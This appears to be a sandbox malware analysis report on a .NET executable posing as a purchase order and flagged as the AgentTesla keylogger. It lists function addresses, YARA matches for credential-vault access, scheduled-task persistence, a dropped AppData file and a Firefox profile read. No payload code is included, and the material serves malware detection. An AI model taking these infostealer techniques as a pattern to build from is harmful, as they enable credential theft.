Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05B11648	0_2_05B11648
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05B10367	0_2_05B10367
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05CAD808	0_2_05CAD808
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05C90040	0_2_05C90040
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05C90006	0_2_05C90006
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05CACBA8	0_2_05CACBA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_01134A60	8_2_01134A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_01139C68	8_2_01139C68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0113CF28	8_2_0113CF28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_01133E48	8_2_01133E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_01134190	8_2_01134190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_060C56B0	8_2_060C56B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_060C0040	8_2_060C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_060C3F28	8_2_060C3F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_060CBCC8	8_2_060CBCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_060C9AA0	8_2_060C9AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_060C2AE8	8_2_060C2AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_060C8B5A	8_2_060C8B5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_060CDBF8	8_2_060CDBF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_060C321B	8_2_060C321B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_060C4FD0	8_2_060C4FD0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_00F420A0	10_2_00F420A0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_00F42090	10_2_00F42090
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_00F426F0	10_2_00F426F0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05E775C0	10_2_05E775C0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05E74EE0	10_2_05E74EE0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05E789BC	10_2_05E789BC
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05E7D5D0	10_2_05E7D5D0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05E7A530	10_2_05E7A530
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05E71788	10_2_05E71788
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05E71798	10_2_05E71798
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05E74ED0	10_2_05E74ED0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05EE3D90	10_2_05EE3D90
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05EEC0A8	10_2_05EEC0A8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05EE3D81	10_2_05EE3D81
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05EE20E8	10_2_05EE20E8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05EE20F8	10_2_05EE20F8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05EEC09A	10_2_05EEC09A
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05EECB71	10_2_05EECB71
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05EE4333	10_2_05EE4333
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06199DF8	10_2_06199DF8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06195AF0	10_2_06195AF0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06193F10	10_2_06193F10
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06193F06	10_2_06193F06
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_0619BC80	10_2_0619BC80
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_0619CC80	10_2_0619CC80
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06199DE9	10_2_06199DE9
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06195AE4	10_2_06195AE4
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06197038	10_2_06197038
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06197028	10_2_06197028
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06190040	10_2_06190040
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_061A85C8	10_2_061A85C8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_061A836C	10_2_061A836C
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_061A716F	10_2_061A716F
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_061B0040	10_2_061B0040
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_061B1648	10_2_061B1648
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_061B0367	10_2_061B0367
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_0634D808	10_2_0634D808
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_0634CBA8	10_2_0634CBA8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_0633003B	10_2_0633003B
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06330040	10_2_06330040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_02FB93F8	11_2_02FB93F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_02FB4A60	11_2_02FB4A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_02FB3E48	11_2_02FB3E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_02FBCF28	11_2_02FBCF28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_02FB9C70	11_2_02FB9C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_02FB4190	11_2_02FB4190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_065656A8	11_2_065656A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_06560040	11_2_06560040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_06562EE8	11_2_06562EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_06563F20	11_2_06563F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_0656DC00	11_2_0656DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_0656BCC0	11_2_0656BCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_06569A98	11_2_06569A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_06568B60	11_2_06568B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_06563630	11_2_06563630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_06564FC8	11_2_06564FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_02FB9C68	11_2_02FB9C68
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_00DF21F8	13_2_00DF21F8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_00DF2208	13_2_00DF2208
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_00DF2C58	13_2_00DF2C58
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_00DF2C48	13_2_00DF2C48
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05D74FE8	13_2_05D74FE8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05D786E4	13_2_05D786E4
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05D772E8	13_2_05D772E8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05D74FD8	13_2_05D74FD8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05D7D700	13_2_05D7D700
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05D71890	13_2_05D71890
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05D718A0	13_2_05D718A0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05D7A258	13_2_05D7A258
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DE4190	13_2_05DE4190
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DEC0A0	13_2_05DEC0A0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DE24F8	13_2_05DE24F8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DE24E8	13_2_05DE24E8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DE4732	13_2_05DE4732
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DE4181	13_2_05DE4181
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DEC093	13_2_05DEC093
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DECF80	13_2_05DECF80
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DECF71	13_2_05DECF71
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F59DF8	13_2_05F59DF8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F556F8	13_2_05F556F8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F59DE9	13_2_05F59DE9
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F5BC80	13_2_05F5BC80
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F53F18	13_2_05F53F18
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F53F08	13_2_05F53F08
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F556EC	13_2_05F556EC
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F5C880	13_2_05F5C880
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F50040	13_2_05F50040
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F57040	13_2_05F57040
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F57008	13_2_05F57008
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F684A0	13_2_05F684A0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F68491	13_2_05F68491
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F70040	13_2_05F70040
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F71648	13_2_05F71648
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F70367	13_2_05F70367
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_0624D808	13_2_0624D808
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_0624CBA8	13_2_0624CBA8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_06230006	13_2_06230006
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_06230040	13_2_06230040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_02E34A60	14_2_02E34A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_02E33E48	14_2_02E33E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_02E3CFE9	14_2_02E3CFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_02E39C69	14_2_02E39C69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_02E34190	14_2_02E34190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_063756A8	14_2_063756A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06370040	14_2_06370040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06372EE8	14_2_06372EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06373F20	14_2_06373F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0637BCC0	14_2_0637BCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06378B52	14_2_06378B52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0637DBF0	14_2_0637DBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0637361B	14_2_0637361B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06374FC8	14_2_06374FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_02E39C62	14_2_02E39C62

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000000.1255560038.00000000000E2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWcbnxpci.exe2 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000029BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1314610366.00000000056B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameHdvbwcwj.dll" vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWcbnxpci.exe2 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000028FB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1289616229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000025E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000025E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1314300994.0000000005638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWcbnxpci.exe2 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1316499062.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Binary or memory string: OriginalFilenameWcbnxpci.exe2 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 13.2.Iujcy.exe.3910328.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 13.2.Iujcy.exe.3910328.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 10.2.Iujcy.exe.3ee4480.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.Iujcy.exe.3ee4480.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 13.2.Iujcy.exe.3910328.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 13.2.Iujcy.exe.3910328.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 10.2.Iujcy.exe.3ee4480.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.Iujcy.exe.3ee4480.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@2/2

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

File created: C:\Users\user\AppData\Roaming\Iujcy.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	ReversingLabs: Detection: 31%
